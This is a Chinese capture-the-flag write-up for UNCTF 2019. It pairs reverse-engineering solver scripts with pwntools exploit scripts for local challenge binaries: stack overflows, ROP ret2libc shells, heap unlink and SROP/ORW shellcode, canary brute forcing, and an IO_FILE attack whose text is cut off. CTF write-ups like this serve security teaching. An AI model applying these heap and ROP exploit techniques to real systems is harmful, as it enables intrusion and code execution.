2019UNCTF-竞技赛 部分WP

web  RE PWN Crypto misc 新手  求带  

 

 

RE

fackre

这个当时 没有做出来  去看牙了,,,,, 最后复现出来了。,。

直接看脚本

 

from Crypto.Util.number import *
#import gmpy2
import binascii
import hashlib
# Byte substitution table consumed by re_table(): each of the four bytes of a
# 32-bit word is used as an index here (0..255; presumably 256 entries, not
# counted). Values were dumped from the target binary by the author.
lists=[0x1b,0x5d,0x42,0x2b,0xd,0x5,0x48,0xe6,0x35,0x16,0x9e,0xb5,0xbb,0xe3,0x24,0xf,0x13,0xc0,0x59,0x96,0x5a,0x12,0x2b,0xe0,0x8f,0x21,0x8c,0x52,0xde,0x92,0x12,0x84,0xa3,0xe2,0x6e,0x7b,0x76,0xa2,0xf,0x51,0x93,0xa9,0x78,0xab,0x5f,0x5e,0x16,0x82,0x72,0x82,0x26,0xd1,0x26,0xd4,0x9,0xbf,0x74,0xda,0xa7,0x3e,0x99,0x2,0x65,0xc3,0xb3,0xad,0xe0,0x5a,0xab,0x7a,0x83,0x93,0x3f,0xa4,0x11,0x3d,0x8e,0xd,0xdf,0x5a,0x71,0x8,0x3a,0xc8,0xf4,0x90,0x16,0x1b,0x88,0xc6,0x50,0x6f,0xd1,0xa4,0xb3,0x73,0x7b,0x82,0xbf,0xb2,0x5f,0x94,0xde,0xca,0x5a,0x5e,0xab,0x25,0xbe,0x8c,0x1b,0x80,0x65,0x9e,0xec,0x5a,0x37,0x2a,0x75,0x2c,0x2d,0xba,0x56,0xd0,0xba,0x3a,0xb6,0x94,0x81,0x70,0x87,0x75,0x3d,0x48,0x63,0x7d,0x52,0x81,0x39,0xb5,0x23,0xd4,0xd3,0xdd,0x4b,0xd9,0xb8,0x35,0xa3,0xca,0x40,0x77,0x52,0x7c,0x9e,0x6c,0x42,0xd8,0x53,0x6f,0xea,0x2e,0xc,0x9a,0xf3,0x2a,0x6a,0xd5,0xea,0x6b,0x93,0x2f,0x18,0x5c,0xbe,0x96,0xb4,0x26,0xf,0xdb,0x9f,0x7,0x30,0xaf,0x93,0x34,0x27,0x8e,0xa,0xca,0x53,0xb7,0xc9,0x8f,0x9b,0x40,0x87,0x54,0x50,0x53,0x1e,0x55,0x6,0x4,0x87,0xc9,0x5e,0x78,0xa0,0x3f,0x66,0x8,0xb0,0x9,0x6e,0x83,0xe5,0x6c,0x23,0xe6,0x74,0x83,0x1,0xa4,0x7f,0x62,0x39,0x9,0x94,0x32,0xd3,0x88,0x93,0x61,0xc2,0xc6,0x61,0x6b,0x28,0xc7,0x61,0xdd,0xdb,0x90,0xa9,0xd5,0xd8,0x8a,0xa4,0xa0,0x65,0xc1,0x35,0x41,0xba,0xcf,0x4a,0x47,0xca,0xaf,0x51,0xe1,0x72,0x5a,0xbf,0x1e,0xb3,0x7a,0x80,0xf2,0x7a,0xcb,0x25,0xe6,0x98,0x96,0x1b,0x53,0x44,0xd8,0x3c,0xac,0x12,0xb1,0x64,0x47,0x35]

def rol_4(value, count):
    """Rotate *value* left by *count* bits inside a 32-bit word.

    The amount is reduced modulo 32; bits pushed out at the top re-enter at
    the bottom and the result is masked to 32 bits. Assumes *value* itself
    fits in 32 bits (callers pass masked words).
    """
    count = count % 32
    wrapped = value >> (32 - count)
    rotated = (value << count) | wrapped
    return rotated & 0xffffffff

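def ror_4(value, count):
    """Rotate *value* right by *count* bits inside a 32-bit word.

    Mirrors rol_4: the amount is reduced modulo 32 and the result is masked
    to 32 bits. Assumes *value* fits in 32 bits (callers pass masked words).
    """
    nbits = 32
    # The original wrote `count%nbits` and discarded the result, so any
    # count >= 32 produced a negative shift below; rol_4 already uses `%=`.
    count %= nbits
    low = value >> count
    value <<= (nbits - count)
    value |= low
    return value & 0xffffffff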


def re_table(a1):
    """One substitute-and-rotate round on a 32-bit word.

    Every byte of *a1* is replaced through the module-level ``lists`` table
    (staying in its byte position), then the four rotations
    ror(v,6), ror(v,8), rol(v,10), rol(v,12) are XOR-ed together.
    """
    substituted = 0
    for shift in (0, 8, 16, 24):
        substituted |= lists[(a1 >> shift) & 0xff] << shift
    mixed = ror_4(substituted, 6) ^ ror_4(substituted, 8)
    mixed ^= rol_4(substituted, 10)
    return mixed ^ rol_4(substituted, 12)


# Initial 32-bit state words (constants taken from the target by the author).
# The __main__ loop below treats them as a four-word shift register.
a1=0xCC227F52
a2=0x5227AA48
a3=0x34725FD0
a4=0x0F276B39


if __name__ == "__main__":
    # 0x1d-4+1 = 26 rounds. Each round drops a4, shifts the other words down
    # and inserts a4 ^ re_table(a1 ^ a2 ^ a3) at the top. (Indentation was
    # reconstructed from the whitespace-stripped source: the flag is built
    # once, after the loop.)
    rounds = 0x1d - 4 + 1
    for _ in range(rounds):
        a1, a2, a3, a4 = a4 ^ re_table(a1 ^ a2 ^ a3), a1, a2, a3
    # Little-endian packing of the final state; latin-1 decoding maps each
    # byte to chr(byte), exactly like appending chr(i) per byte.
    flag_s = b"".join(w.to_bytes(4, 'little') for w in (a1, a2, a3, a4))
    flag = "UNCTF{" + flag_s.decode("latin-1") + "-Wh4t_aB0ut_yoU233?}"
    print(flag)


#print binascii.unhexlify(flag)

 

 

 

666:

就是一个简单的异或移位算法  逆推回去就可以了

 

 

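key = 0x12
cmpstr = 'izwhroz""w"v.K".Ni'

flag = ""
# key (0x12 = 18) doubles as the ciphertext length. Each plaintext byte is
# recovered as (c ^ key) followed by -6, +6 or ^6 depending on its position
# within a group of three.
for i in range(0, key, 3):
    flag += chr((ord(cmpstr[i]) ^ key) - 6)
    flag += chr((ord(cmpstr[i + 1]) ^ key) + 6)
    flag += chr((ord(cmpstr[i + 2]) ^ key) ^ 6)

# Python 2 `print flag` statement replaced with the function form, which
# prints the same single string on either interpreter.
print(flag)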

 

 

世界上最好的xor

动态就有flag。。。

 

 

Checkhex

就是一个stringtohex。。。

Easy maze

一个简单的maze 题目

 

地图可以动态直接拿,,

然后简单的bfs就可以拿到flag。。

#include<stdio.h>

#include<string.h>

#include<algorithm>

#include<vector>

#include<iostream>

#include<map>

#include<time.h>

#include<queue>

using namespace std;

// 7x7 maze dumped from the binary. Non-zero cells are walkable (see pd());
// the search starts at (0,0) and stops at (6,6) (see slove()).
int s[7][7]={
    1,0,0,1,1,1,1,
    1,0,1,1,0,0,1,
    1,1,1,0,1,1,1,
    0,0,0,1,1,0,0,
    1,1,1,1,0,0,0,
    1,0,0,0,1,1,1,
    1,1,1,1,1,0,1,
};

// Step deltas for the four moves, index-aligned with the key letter in w[]
// that slove() records for that move (d, s, a, w).
int hh[5]= {1,0,-1,0};//y
int kk[5]= {0,1,0,-1};//x
char w[5]={'d','s','a','w'};
 //O left, o right, 0 down, . up
bool vis[9][9];   // visited flags; oversized relative to the 7x7 grid
struct code{
 int x,y;         // cell position; x is the first index into s[][]/vis[][] in pd()
 queue<char>l;    // key letters taken to reach (x,y)
}as,ad;

// True when (i,j) lies inside the 7x7 grid, has not been visited yet and
// is a walkable (non-zero) cell of s.
bool pd(int i, int j)
{
    bool inside = i >= 0 && i < 7 && j >= 0 && j < 7;
    return inside && !vis[i][j] && s[i][j] != 0;
}

 

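// Breadth-first search from (0,0) to (6,6); prints the key sequence of the
// first (shortest) path found, without a trailing newline.
void slove()
{
    memset(vis, 0, sizeof(vis));
    queue<code> qq;
    as.x = 0, as.y = 0;
    while (!as.l.empty())
        as.l.pop();
    // The start cell was never marked visited, so it could be re-queued
    // from its neighbour; mark it like every other expanded cell.
    vis[as.x][as.y] = 1;
    qq.push(as);
    while (!qq.empty())
    {
        ad = qq.front();
        qq.pop();
        if (ad.x == 6 && ad.y == 6)
        {
            while (!ad.l.empty())
            {
                printf("%c", ad.l.front());
                ad.l.pop();
            }
            // Goal reached; the rest of the queue cannot print anything
            // (vis stops a second visit), so stop instead of draining it.
            return;
        }
        for (int i = 0; i < 4; i++)
        {
            as = ad;                 // copy the path so far
            as.x = ad.x + kk[i];
            as.y = ad.y + hh[i];
            if (pd(as.x, as.y))
            {
                as.l.push(w[i]);
                qq.push(as);
                vis[as.x][as.y] = 1;
            }
        }
    }
}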

int main()
{
    // Prints the d/s/a/w key sequence from (0,0) to (6,6) found by slove().
   slove();
   return 0;
}

Easy vm

动态走几遍就ok了,具体看脚本== =

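ls = [
    0xF4, 0x0A, 0xF7, 0x64, 0x99, 0x78, 0x9E, 0x7D, 0xEA, 0x7B, 0x9E, 0x7B, 0x9F, 0x7E, 0xEB, 0x71,
    0xE8, 0x00, 0xE8, 0x07, 0x98, 0x19, 0xF4, 0x25, 0xF3, 0x21, 0xA4, 0x2F, 0xF4, 0x2F, 0xA6, 0x7C,
]

flag = ""
# Walk the 32-byte table from the end: every byte is XOR-ed with 0xCD and
# with its predecessor (0 for index 0), then its index is added.
for i in range(31, -1, -1):
    temp = ls[i] ^ 0xCD
    count = 0 if i == 0 else ls[i - 1]
    temp ^= count
    # chr() needs 0..255; for this table the sum stays in range.
    temp += i
    flag += chr(temp)

# Characters were produced last-first, so reverse on output. The Python 2
# `print flag[::-1]` statement is replaced with the function form.
print(flag[::-1])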

 

 

Easy android

 

这个题目函数逻辑很清楚。

就是简单的异或 然后对比md5值

去md5网站直接解不行, 因为这里是可见字符 异或 一个字符串内容 才md5的

所以 还是python 直接暴力可行  4位一组 很好爆破

#coding:utf-8

import hashlib
import string


# bd1d6ba7f1d3f5a13ebb0a75844cccfa
# NOTE(review): every brute-force stage below sits inside a ''' ... ''' string
# literal (i.e. disabled), and the ''' opened before the final stage is never
# closed in the text as extracted, so this file does not parse as-is.
# Each stage enumerates all printable 4-character groups, XORs them with the
# corresponding 4 bytes of fake_str and compares the MD5 against a stored
# digest. hashlib.md5() is fed a str here, which only works on Python 2.

'''
fake_str='flag{this_is_a_fake_flag_ahhhhh}'
a = "2061e19de42da6e0de934592a2de3ca0"
b = "a81813dabd92cefdc6bbf28ea522d2d1"
c = "4b98921c9b772ed5971c9eca38b08c9f"
d = "81773872cbbd24dd8df2b980a2b47340"
e = "73b131aa8e4847d27a1c20608199814e"
f = "bbd7c4e20e99f0a3bf21c148fe22f21d"
gg = "bf268d46ef91eea2634c34db64c91ef2"
h = "0862deb943decbddb87dbf0eec3a06cc"
l=string.printable
flag=""
'''
'''for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord('f'))
                flag+=chr(ord(j)^ord('l'))
                flag+=chr(ord(k)^ord('a'))
                flag+=chr(ord(g)^ord('g'))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode=="2061e19de42da6e0de934592a2de3ca0":
                    print (i+j+k+g)
'''
'''
sss=0
print "[*]2"
for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord(fake_str[sss*4+4]))
                flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
                flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
                flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==b:
                    print (i+j+k+g)

sss=sss+1
print "[*]3"
for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord(fake_str[sss*4+4]))
                flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
                flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
                flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==c:
                    print (i+j+k+g)

sss=sss+1
print "[*]4"
for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord(fake_str[sss*4+4]))
                flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
                flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
                flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==d:
                    print (i+j+k+g)        
sss=sss+1
print "[*]5"
for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord(fake_str[sss*4+4]))
                flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
                flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
                flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==e:
                    print (i+j+k+g)
sss=sss+1
print "[*]6"
for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord(fake_str[sss*4+4]))
                flag+=chr(ord(j)^ord(fake_str[sss*4+5]))
                flag+=chr(ord(k)^ord(fake_str[sss*4+6]))
                flag+=chr(ord(g)^ord(fake_str[sss*4+7]))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==f:
                    print (i+j+k+g)
'''
#sss=sss+1
'''
print "[*]7"
for i in l:
    for j in l:
        for k in l:
            for g in l:#_ahh
                flag=chr(ord(i)^ord('_'))
                flag+=chr(ord(j)^ord('a'))
                flag+=chr(ord(k)^ord('h'))
                flag+=chr(ord(g)^ord('h'))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==gg:
                    print (i+j+k+g)
'''
'''

for i in l:
    for j in l:
        for k in l:
            for g in l:
                flag=chr(ord(i)^ord('h'))
                flag+=chr(ord(j)^ord('h'))
                flag+=chr(ord(k)^ord('h'))
                flag+=chr(ord(g)^ord('}'))
                checkcode = hashlib.md5(flag).hexdigest()
                if checkcode==h:
                    print (i+j+k+g)

 

奇妙的RTF

 

这个题目有提示

 

OFFICE 2017年某CVE  百度一下就知道了是哪个,,

So  找到点

 

 

拿到flag

 

没事 不难

这个题目 有个坑点 就是 要找到程序真正的计算的地方。

里面是一个有点难搞的算法

 写一个脚本 搞出来就可以了

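flag = ""

l = [0x0B3, 0x9C, 0x0B7, 0x0BF, 0x0B2, 0x0CB, 0x0D3, 0x0BF, 0x0B2, 0x0CB, 0x0D3, 0x0C9,
     0x0B1, 0xcb, 0x0D3, 0x0BB, 0x0AE, 0x0AD, 0x0A3, 0x0CF, 0x0AD, 0x0CD, 0x9F, 0x0BB]

# Each group of four table bytes yields three plaintext bytes: subtracting
# 0x96 leaves a 6-bit value per byte, and the 24 bits are regrouped into
# three 8-bit characters (base64-style). Under Python 3 the original `/`
# became float division, so bits and chr() arguments turned into floats;
# `//` restores the Python 2 integer behaviour.
for i in range(6):
    s = []
    for j in range(3, -1, -1):
        temp = l[i * 4 + j] - 0x96
        for k in range(6):
            s.append(temp % 2)       # bits collected LSB first
            temp = temp // 2

    temp = 0
    print(len(s))
    bits = 128
    count = 0
    for k in range(len(s) - 1, -1, -1):
        temp = temp + s[k] * bits
        bits = bits // 2
        count += 1
        if count == 8:
            count = 0
            bits = 128
            flag += chr(temp)
            temp = 0

print(flag)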

 

 

PWN:

Soso easy pwn

 

直接栈溢出就可以  只不过 需要爆破一位  16分之1的几率

# -*- coding: utf-8 -*-

from pwn import *

context.log_level='debug'

if __name__ =="__main__":
    # Retry loop: the write-up says one nibble of the address must be guessed
    # (1/16 chance), so a new local process is started until the connection
    # survives (no EOFError) and the session is then handed to the user.
    while True :
        try:
            io=process('./pwn')
            elf=ELF('./pwn')
            io.recv(16)
            addr=int(io.recv(5))        # five decimal digits printed by the target
            #print hex(addr)
            # 'a' is the fixed guess for the unknown nibble (presumably).
            back_door=int(hex(addr)+'a'+'9cd',16)
            log.success("back_door "+hex(back_door))
            payload='a'*0xc+p32(back_door)
            io.send(payload)
            sleep(0.1)
            io.recv()
            io.sendline('0')
            io.recv()
            #io.recv()
        except EOFError:
            io.close()
        else:
            io.interactive()

 

 

Orw:

 

Orw的题目。。

# -*- coding: utf-8 -*-

from pwn import *

context.log_level='debug'

 

def add(size, content):
    """Menu option 1 of the target: send *size* and then *content*."""
    io.sendlineafter("Your Choice: ", '1')
    io.sendlineafter("size: ", str(size))
    io.sendlineafter("content: ", content)

 

def delete(index):
    """Menu option 2 of the target: send the entry *index*."""
    io.sendlineafter("Your Choice: ", '2')
    io.sendlineafter("idx: ", str(index))

 

def edit(index, content):
    """Menu option 3 of the target: send *index* and then the new *content*."""
    io.sendlineafter("Your Choice: ", '3')
    io.sendlineafter("idx: ", str(index))
    io.sendlineafter("content: ", content)

#io=remote('101.71.29.5',10005)
#libc=ELF('./x64_libc.so.6')
if __name__ =="__main__":
    # Local run against ./pwn_heap with the system glibc 2.23. Every raw
    # offset below (the gadget addresses, setcontext+53, the 0xfbad2887 flags
    # word, the 0x55dd partial write) is tied to that exact libc build and
    # the author's environment; it will not transfer unchanged.
    io=process('./pwn_heap')
    elf=ELF('./pwn_heap')
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

    add(0x68,'')
    add(0x78,'')
    add(0x68,(p64(0)+p64(0x21))*6+'')
    add(0x68,(p64(0)+p64(0x21))*6+'')
    delete(0)
    io.sendlineafter('Your Choice: ','1')
    io.sendlineafter('size: ',str(0x68))
    io.sendafter('content: ','a' * 0x60 + p64(0) + p8(0xf1))
    delete(1)
    delete(2)
    add(0x78,'')
    delete(0)
    add(0x68,'a'*0x60+p64(0)+p8(0xa1))
    delete(1)
    add(0x98,'')
    edit(1,'b'*0x70+p64(0)+p64(0x71)+p16(0x55dd))
    add(0x68,'')

    add(0x68,'c'*0x33+p64(0xfbad2887|0x1000)+p64(0)*3)
    # The leak is read from a fixed slice of whatever arrives before the
    # 0xff marker; data[0x88:0x90] is an empirical offset.
    data=io.recvuntil('\xff\xff\xff\xff\xff\xff\xff\xff')
    address=u64(data[0x88:0x90])
    libc_addr=address-libc.symbols['_IO_2_1_stdin_']
    success('libc_base:'+hex(libc_addr))
    pause()
    edit(1,'b'*0x70+p64(0)+p64(0x91))
    delete(2)
    edit(1,'b'*0x70+p64(0)+p64(0x91)+p64(0)+p64(libc_addr+libc.symbols['__free_hook']-0x20))
    add(0x88,'')
    #fastbinattack
    edit(1,'b'*0x70+p64(0)+p64(0x71))
    delete(2)
    edit(1,'b'*0x70+p64(0)+p64(0x71)+p64(libc_addr+libc.symbols['__free_hook']-0x13))
    frame=SigreturnFrame()
    frame.rdi=0
    frame.rsi=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000#
    frame.rdx=0x2000
    frame.rsp=(libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000
    frame.rip=libc_addr+0x00000000000bc375#:syscall;ret;-->rcx
    payload=str(frame)          # Python 2: str() of the frame is its raw bytes

    add(0x68,payload[0x80:0x80+0x60])
    add(0x68,'fff'+p64(libc_addr+libc.symbols['setcontext']+53))

    edit(1,payload[:0x98])
    delete(1)
    layout=[
        libc_addr+0x0000000000021102,#:poprdi;ret;
        (libc_addr+libc.symbols['__free_hook'])&0xfffffffffffff000,
        libc_addr+0x00000000000202e8,#:poprsi;ret;
        0x2000,
        libc_addr+0x0000000000001b92,#:poprdx;ret;
        7,
        libc_addr+0x0000000000033544,#:poprax;ret;
        10,
        libc_addr+0x00000000000bc375,#:syscall;ret;
        libc_addr+0x0000000000002a71,#:jmprsp;
    ]
    # Assembly text is kept exactly as on the page (blank lines included);
    # the assembler ignores them.
    shellcode=asm('''

sub rsp, 0x800

push 0x67616c66

mov rdi, rsp

xor esi, esi

mov eax, 2

syscall

cmp eax, 0

js failed

mov edi, eax

mov rsi, rsp

mov edx, 0x100

xor eax, eax

syscall

mov edx, eax

mov rsi, rsp

mov edi, 1

mov eax, edi

syscall

jmp exit

failed:

push 0x6c696166

mov edi, 1

mov rsi, rsp

mov edx, 4

mov eax, edi

syscall

exit:

xor edi, edi

mov eax, 231

syscall

''')

    io.send(flat(layout)+shellcode)
    #pause()
    '''

io.sendline("1")

io.sendline("1")'''
    io.interactive()

 

Driver

 堆重叠+unlink

from pwn import*

context.log_level='debug'

context.arch='amd64'

 

def buy(choice, name):
    """Menu option 1 of the target, then the sub-choice *choice* and a *name*."""
    io.sendlineafter('Your Choice>> \n', '1')
    io.sendlineafter('Your Choice>> \n', str(choice))
    io.sendlineafter('name: ', name)

 

def dele(index):
    """Menu option 3 of the target: send the entry *index*."""
    io.sendlineafter('Your Choice>> \n', '3')
    io.sendlineafter('index: ', str(index))

 

def edit(index, name):
    """Menu option 4 of the target: *name* is sent raw (no trailing newline)."""
    io.sendlineafter('Your Choice>> \n', '4')
    io.sendlineafter('index: ', str(index))
    io.sendafter('name: ', name)

 

def edit1(index, name):
    """Menu option 6 of the target; same prompts as edit(), raw send of *name*."""
    io.sendlineafter('Your Choice>> \n', '6')
    io.sendlineafter('index: ', str(index))
    io.sendafter('name: ', name)

 

def drive(index, con):
    """Menu option 5 of the target: pick *index*, sub-option 1, then *con*."""
    io.sendlineafter('Your Choice>> \n', '5')
    io.sendlineafter('index: ', str(index))
    io.recv()                  # prompt has no fixed delimiter here; drain it
    io.sendline('1')
    io.sendlineafter('Your Choice>> \n', str(con))

 

def drive1(index):
    """Menu option 5 of the target: pick *index*, then sub-option 2."""
    io.sendlineafter('Your Choice>> \n', '5')
    io.sendlineafter('index: ', str(index))
    io.recv()                  # prompt has no fixed delimiter here; drain it
    io.sendline('2')

 

 

 

 

# The process is started at import time, before the __main__ guard, so the
# helpers above can reach it as a global.
io=process('./driver')
elf=ELF('./driver')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
    io.recvuntil('Your Choice>> \n')
    io.sendline('8')
    io.recv(8)
    heap_addr=int(io.recv(12),16)-0x10     # 12 hex digits printed by the target
    success('heap_addr:'+hex(heap_addr))

    buy(2,'a')
    buy(2,'a')
    dele(0)
    buy(1,'a')
    buy(2,'a')
    dele(0)
    dele(2)
    dele(1)
    buy(2,'a')
    buy(1,'a')
    drive(1,2)
    # Python 2 integer division; under Python 3 `/` would yield a float here.
    malloc_hook_addr=int(io.recvuntil("Km")[:-2])/2-88-0x10
    libc_base=malloc_hook_addr-libc.sym['__malloc_hook']
    success('libc_base '+hex(libc_base))
    buy(2,'a')
    dele(0)
    dele(1)
    dele(2)
    buy(2,'a')
    buy(2,'a')
    buy(3,'a'*0x1f0+p64(0x200)+p64(0x31))
    edit(1,'a'*0xf0+p64(0x330))
    dele(0)
    dele(2)
    buy(3,'\x00'*0xf8+p64(0x21)+p64(0xc8)+p64(1)+p64(0)+p64(0xf8)+p64(0)+p64(heap_addr+0x10))
    dele(1)
    buy(1,'a')
    dele(0)
    buy(3,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x30+p64(0x41)+p64(0x100)+'\x00'*0x10+p64(0x220)+p64(0)+p64(heap_addr+0x30)+p64(0)+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(heap_addr+0x10)[:-2])
    dele(1)
    buy(1,'1')
    edit1(0,'\x00'*0xf8+p64(0x21)+p64(heap_addr)+'\x00'*0x70+p64(0x21)+'\x00'*0x68+p64(0x41)+p64(0x64)+p64(0)+p64(0)+p64(0x68)+p64(0)+p64(libc_base+libc.sym['__malloc_hook']))
    # 0x4526a is a raw offset into this particular libc-2.23 build.
    edit1(1,p64(libc_base+0x4526a))

    io.sendline("1")
    sleep(0.5)
    io.sendline("1")

    io.interactive()

 

Shellcode

 这就体验到了 谷歌等搜索能力,,

找到一个符合要求的64位shellcode 是多么的不容易,

import io
from pwn import*
# NOTE(review): the stdlib `io` module imported on the first line is
# immediately shadowed by the process handle named `io` below, so that
# import is dead and misleading.
context.log_level='debug'
context.arch='amd64'

io=process('./shellcode')
elf=ELF('./shellcode')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

if __name__ =="__main__":
    io.recv()
    # Alphanumeric-only payload the author found by searching (per the
    # write-up); sent verbatim as one line.
    io.sendline('Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M154J0S0X2K0W1M0D7p0F0z3V110b154y33164F0Z0D0h0u063O3f0y4y4D1k110n0H3c7l045O3f2n4y5L0Z0E0o3q3X0z0506')#\x0f\x05
    io.interactive()

 

 

Babyrop

 就。。。很简单的rop题目

from pwn import*
context.log_level='debug'
io=process('./babyrop')
elf=ELF('./babyrop')
libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
if __name__ =="__main__":
    io.recvuntil("Hello CTFer!")
    payload='a'*0x20+p32(0x66666666)
    main_addr=0x08048592          # fixed address: the binary is non-PIE (presumably)
    io.sendline(payload)
    io.recvuntil("What is your name?")
    io.sendline('a'*0x14+p32(elf.plt['puts'])+p32(main_addr)+p32(elf.got['puts']))
    io.recv()
    # Assumes the leaked pointer is the first 4 bytes of the next read; a
    # partial read would silently give a wrong base.
    libc_base=u32(io.recv()[:4])-libc.sym['puts']
    success('libc_base:'+hex(libc_base))
    io.sendline(payload)
    io.recv()
    bin_sh_addr=libc_base+libc.search("/bin/sh").next()    # Python 2 iterator API
    io.sendline('a'*0x14+p32(0x0804839e)+p32(libc_base+libc.sym['system'])+p32(main_addr)+p32(bin_sh_addr))
    io.interactive()

 

easy_stack

这个题目给了四次的机会  然后因为  32位的canary 最低位是0x00

所以我们只需要爆破三个字节  然后 最后一次直接getshell 就ok了

 

 

from pwn import*
context.log_level='debug'

if __name__ =="__main__":
    io=process('./easystack')
    elf=ELF('./easystack')
    libc=ELF('/lib/i386-linux-gnu/libc-2.23.so')
    # Three rounds, one canary byte each (the write-up: the low byte of a
    # 32-bit canary is 0x00, so three bytes remain). Each round feeds 255
    # candidate values followed by 44 fillers, then reads a 3-digit count
    # back and derives the byte from it; 299 and 44 are the offsets that
    # calculation relies on.
    io.recvuntil("How much do you want to calc: ")
    io.sendline('301')
    for i in range(1,256):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(i*0x1000000))

    for i in range(44):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(0xff000000))

    io.recv()
    io.sendline('0')
    io.recv(10)
    canary =(255-(int(io.recv(3))-299-44))<<24

    io.recv()
    io.sendline('n')
    io.recvuntil("How much do you want to calc: ")
    io.sendline('301')
    for i in range(1,256):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str((i<<16)+canary))
        #io.sendlineafter('num?(Input 0 to stop): ',str((i<<16)+canary))

    for i in range(44):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(0xffff0000))
        #io.sendlineafter('num?(Input 0 to stop): ',str(0xffff0000))

    io.recv()
    io.sendline('0')
    io.recv(10)
    canary+=(255-(int(io.recv(3))-299-44))<<16

    io.recv()
    io.sendline('n')
    io.recvuntil("How much do you want to calc: ")
    io.sendline('301')
    for i in range(1,256):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str((i<<8)+canary))

    for i in range(44):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline(str(0xffffff00))

    io.recv()
    io.sendline('0')
    io.recv(10)
    canary+=(255-(int(io.recv(3))-299-44))<<8
    #print hex(canary)
    #pause()
    io.recv()
    # Fixed addresses taken from the binary (non-PIE, presumably).
    stream_addr=0x08048750
    cout_addr=0x0804A0C0
    main_addr=0x080488E7
    io.sendline('n')
    io.recvuntil("How much do you want to calc: ")
    io.sendline('320')
    for i in range(300):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')

    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(canary))
    for i in range(3):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')

    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(stream_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(main_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(cout_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(elf.got['setbuf']))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline('0')
    io.recv(10)
    io.recv(3)
    io.sendline('n')
    io.recv()
    libc_base=u32(io.recv(4))-libc.sym['setbuf']
    log.success("libc_base "+hex(libc_base))
    pause()
    io.sendline('320')
    for i in range(300):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')

    io.recv(timeout=0.1)
    io.sendline(str(canary))
    for i in range(3):
        io.recvuntil("num?(Input 0 to stop): ")
        io.sendline('1')

    bin_sh_addr=libc_base+libc.search("/bin/sh").next()    # Python 2 iterator API
    system_addr=libc_base+libc.sym['system']
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(system_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(1))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(bin_sh_addr))
    io.recvuntil("num?(Input 0 to stop): ")
    io.sendline(str(0))

    pause()

    io.interactive()

 

 

Box  有一个任意修改的指针 直接修改io file

from pwn import*

context.log_level='debug'

context.arch='amd64'

 

def add(ids, size):
    """Menu option 1 of the target: send the box id *ids* and then *size*."""
    io.sendlineafter('Your Choice: ', '1')
    io.sendlineafter('Box ID: ', str(ids))
    io.sendlineafter('Size: ', str(size))

 

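def edit(ids, con):
    """Menu option 2 of the target: send the box id *ids*, then *con* raw.

    *con* is sent without a trailing newline (io.send, not io.sendline).
    """
    io.recvuntil('Your Choice: ')
    io.sendline('2')
    io.recvuntil('Box ID: ')
    # Was `io,sendline(str(ids))`: a tuple expression naming an undefined
    # `sendline`, which raised NameError before the id was ever sent.
    io.sendline(str(ids))
    io.recvuntil('Box Content: ')
    io.send(con)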

 

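def dele(ids):
    """Menu option 3 of the target: send the box id *ids*."""
    io.recvuntil('Your Choice: ')
    io.sendline('3')
    io.recvuntil('Box ID: ')
    # Was `io,sendline(str(ids))`: a tuple expression naming an undefined
    # `sendline`, which raised NameError before the id was ever sent.
    io.sendline(str(ids))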

 

if __name__ =="__main__":
    io=process('./Box')
    elf=ELF('./Box')
    libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

    # Negative box ids (-27, -12, -10) are what the write-up calls the
